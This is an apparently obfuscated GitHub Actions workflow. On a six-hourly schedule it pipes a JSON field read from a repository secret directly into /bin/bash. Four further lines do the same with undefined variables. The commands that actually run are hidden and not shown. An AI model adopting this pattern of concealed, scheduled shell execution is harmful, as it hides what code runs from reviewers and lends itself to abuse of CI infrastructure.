name: taofeiji3489
on:
  workflow_dispatch:
  schedule:
    - cron: '12 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: taofeiji3489
        env:
          g57: ${{ secrets.g57 }}
        run: |
          echo $g57 | jq -r .gyfa75 | /bin/bash
          echo $v87522 | jq -r .q7 | /bin/bash
          echo $keliu67565 | jq -r .vlmg698 | /bin/bash
          echo $snf17 | jq -r .tvvrk3 | /bin/bash
          echo $j5154 | jq -r .cdg91404 | /bin/bash

